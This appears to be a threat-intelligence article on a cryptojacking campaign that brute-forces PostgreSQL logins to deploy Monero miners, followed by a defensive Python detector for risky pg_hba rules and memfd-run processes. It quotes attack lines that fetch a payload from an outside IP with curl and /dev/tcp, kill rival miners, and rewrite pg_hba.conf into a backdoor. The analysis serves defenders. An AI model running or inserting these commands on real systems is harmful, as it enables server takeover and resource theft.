A widespread cryptojacking campaign targeting poorly secured PostgreSQL database servers has impacted over 1,500 victims globally.
The attack leverages fileless execution techniques and credential brute-forcing to deploy Monero (XMR)-mining malware while evading traditional cloud workload protection (CWPP) tools.
Security analysts attribute the campaign to threat actor JINX-0126, which has refined its tactics since initial observations by Aqua Security in late 2024.
The attackers exploit PostgreSQL instances exposed online with weak or default credentials, a configuration affecting 30% of cloud-hosted PostgreSQL servers.
After gaining access, they abuse PostgreSQL’s COPY FROM PROGRAM function to execute shell commands, bypassing typical file-write detection methods.
This enables the deployment of a multi-stage payload chain featuring UPX-packed Golang binaries masquerading as legitimate PostgreSQL processes.
Wiz Threat Research analysts identified three cryptocurrency wallets linked to the campaign, each showing ~550 active mining workers via C3Pool telemetry.
At peak activity, the operation generated 4.04 GH/s of hashrate – equivalent to ~€10.40/hour in XMR revenue at current valuations.
While financially motivated, the attack’s fileless design and system reconfigurations create persistent backdoors for potential escalation to ransomware or data exfiltration.
Infection Mechanism and Defense Evasion
The attack begins with credential spraying against PostgreSQL’s default postgres account and other common usernames.
Successful logins trigger this SQL statement to fetch the initial payload:
COPY FROM PROGRAM 'kill -9 $(pgrep zsvc) [...] curl -ksS 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv -o pg_core'
This script terminates competing cryptominers like kinsing and kdevtmpfsi before retrieving the pg_core binary.
Unlike conventional malware, the payload cpu_hu (Figure 2: Process Tree) executes entirely in memory via Linux’s memfd subsystem, leaving minimal disk artifacts:
exec 5<>/dev/tcp/159.223.123.175/36287 [...] cat) postmaster
To ensure persistence, the malware modifies PostgreSQL’s pg_hba.conf to block external authentication attempts while granting local network access:
host all pgg_superadmins all reject
host all all 127.0.0.1/8 trust
Concurrently, it creates cronjobs for minute-by-minute reactivation and deploys a privileged user psql_sys via CREATE ROLE.
Each binary contains unique configuration blobs encrypted with AES-256, ensuring every victim’s payload has distinct hashes to evade signature-based detection.
This campaign underscores critical cloud security gaps: 90% of environments host PostgreSQL instances, many with inadequate access controls.
Wiz recommends enforcing network-level restrictions, auditing credentials, and implementing runtime monitoring for memfd-based execution – a key IoC flagged in their advisory.
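As an added defender-side example (not code from the article or from Wiz), the following Python checks two of the indicators described above: pg_hba.conf rules that pair a reject line with a password-less trust line, and processes whose executable exists only in memory (memfd), which Wiz recommends monitoring at runtime. The sample pg_hba.conf content is constructed for illustration; the rule names and the `scan_memfd_processes` helper are this example's own.

```python
import os
from typing import Dict, List

# Constructed sample pg_hba.conf; the reject/trust lines mirror the two quoted above,
# the last line is an ordinary password-authenticated rule that should not be flagged.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER             ADDRESS       METHOD
host    all       pgg_superadmins  all           reject
host    all       all              127.0.0.1/8   trust
host    all       all              10.0.0.0/8    scram-sha-256
"""

def parse_pg_hba(text: str) -> List[Dict[str, str]]:
    """Parse host* rules in CIDR form (TYPE DB USER ADDRESS METHOD); local rules skipped."""
    rules = []
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) >= 5 and parts[0].startswith("host"):
            rules.append(dict(zip(("type", "db", "user", "addr", "method"), parts)))
    return rules

def find_risky_hba_rules(text: str) -> List[str]:
    """Flag password-less `trust` rules and `reject` rules (lock-out plus self-access pattern)."""
    findings = []
    for r in parse_pg_hba(text):
        if r["method"] == "trust":
            findings.append(f"trust (no password) for {r['user']} from {r['addr']}")
        elif r["method"] == "reject":
            findings.append(f"reject for {r['user']} from {r['addr']}")
    return findings

def is_memfd_exe(exe_target: str) -> bool:
    """True if a /proc/<pid>/exe link target is an anonymous memfd file, which the
    kernel renders as '/memfd:<name> (deleted)': the binary was never written to disk."""
    return exe_target.startswith("/memfd:")

def scan_memfd_processes(proc_root: str = "/proc") -> List[Dict[str, str]]:
    """List processes running from memfd; comm is included so a process calling itself
    'postmaster' with a memfd exe stands out. Reading other users' exe links needs root."""
    hits = []
    for pid in (p for p in os.listdir(proc_root) if p.isdigit()):
        try:
            exe = os.readlink(os.path.join(proc_root, pid, "exe"))
            with open(os.path.join(proc_root, pid, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            continue  # process exited or permission denied; skip it
        if is_memfd_exe(exe):
            hits.append({"pid": pid, "comm": comm, "exe": exe})
    return hits
```

Run `scan_memfd_processes()` as root on the database host; any hit whose `comm` is a PostgreSQL process name but whose `exe` is a memfd file warrants investigation.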
With opportunistic attacks increasingly targeting databases, organizations must prioritize configuration hygiene alongside behavioral threat detection.